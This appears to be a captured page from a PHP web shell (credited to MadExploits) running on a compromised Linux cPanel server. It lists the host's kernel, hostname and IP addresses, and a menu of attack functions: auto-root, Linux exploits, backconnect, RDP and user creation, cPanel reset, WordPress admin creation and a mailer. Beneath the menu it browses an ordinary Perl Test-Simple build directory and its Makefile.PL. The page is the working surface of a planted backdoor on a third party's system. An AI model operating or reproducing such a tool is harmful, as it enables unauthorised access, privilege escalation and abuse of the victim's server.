Linux dpw.dpwebtech.com 3.10.0-1160.88.1.el7.x86_64 #1 SMP Tue Mar 7 15:41:52 UTC 2023 x86_64
Apache
: 192.232.243.69 | : 3.12.162.21
54 Domain
7.3.33
dpclient
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
.cpanplus /
5.16.3 /
build /
Test-Simple-1.302175 /
[ HOME SHELL ]
Name
Size
Permission
Action
blib
[ DIR ]
drwxr-xr-x
examples
[ DIR ]
drwxr-xr-x
lib
[ DIR ]
drwxr-xr-x
t
[ DIR ]
drwxr-xr-x
xt
[ DIR ]
drwxr-xr-x
Changes
83.74
KB
-rw-r--r--
LICENSE
17.92
KB
-rw-r--r--
MANIFEST
9.42
KB
-rw-r--r--
META.json
2.27
KB
-rw-r--r--
META.yml
1.43
KB
-rw-r--r--
MYMETA.json
2.41
KB
-rw-r--r--
MYMETA.yml
1.5
KB
-rw-r--r--
Makefile
44.95
KB
-rw-r--r--
Makefile.PL
1.8
KB
-rw-r--r--
README
6.21
KB
-rw-r--r--
README.md
6.7
KB
-rw-r--r--
appveyor.yml
693
B
-rw-r--r--
cpanfile
560
B
-rw-r--r--
dist.ini
3.02
KB
-rw-r--r--
pm_to_blib
0
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Makefile.PL
# This file was automatically generated by Dist::Zilla::Plugin::MakeMaker v6.014. use strict; use warnings; use 5.006002; use ExtUtils::MakeMaker; my %WriteMakefileArgs = ( "ABSTRACT" => "Basic utilities for writing tests.", "AUTHOR" => "Chad Granum <exodist\@cpan.org>", "CONFIGURE_REQUIRES" => { "ExtUtils::MakeMaker" => 0 }, "DISTNAME" => "Test-Simple", "LICENSE" => "perl", "MIN_PERL_VERSION" => "5.006002", "NAME" => "Test::Simple", "PREREQ_PM" => { "File::Spec" => 0, "File::Temp" => 0, "Scalar::Util" => "1.13", "Storable" => 0, "utf8" => 0 }, "VERSION" => "1.302175", "test" => { "TESTS" => "t/*.t t/Legacy/*.t t/Legacy/Bugs/*.t t/Legacy/Builder/*.t t/Legacy/Regression/*.t t/Legacy/Simple/*.t t/Legacy/Test2/*.t t/Legacy/Tester/*.t t/Legacy/subtest/*.t t/Legacy_And_Test2/*.t t/Test2/acceptance/*.t t/Test2/behavior/*.t t/Test2/legacy/*.t t/Test2/modules/*.t t/Test2/modules/API/*.t t/Test2/modules/Event/*.t t/Test2/modules/Event/TAP/*.t t/Test2/modules/EventFacet/*.t t/Test2/modules/Formatter/*.t t/Test2/modules/Hub/*.t t/Test2/modules/Hub/Interceptor/*.t t/Test2/modules/IPC/*.t t/Test2/modules/IPC/Driver/*.t t/Test2/modules/Tools/*.t t/Test2/modules/Util/*.t t/Test2/regression/*.t t/regression/*.t" } ); my %FallbackPrereqs = ( "File::Spec" => 0, "File::Temp" => 0, "Scalar::Util" => "1.13", "Storable" => 0, "utf8" => 0 ); unless ( eval { ExtUtils::MakeMaker->VERSION(6.63_03) } ) { delete $WriteMakefileArgs{TEST_REQUIRES}; delete $WriteMakefileArgs{BUILD_REQUIRES}; $WriteMakefileArgs{PREREQ_PM} = \%FallbackPrereqs; } delete $WriteMakefileArgs{CONFIGURE_REQUIRES} unless eval { ExtUtils::MakeMaker->VERSION(6.52) }; $WriteMakefileArgs{INSTALLDIRS} = 'perl' if "$]" >= 5.006002 && "$]" <= 5.011000; WriteMakefile(%WriteMakefileArgs);
Close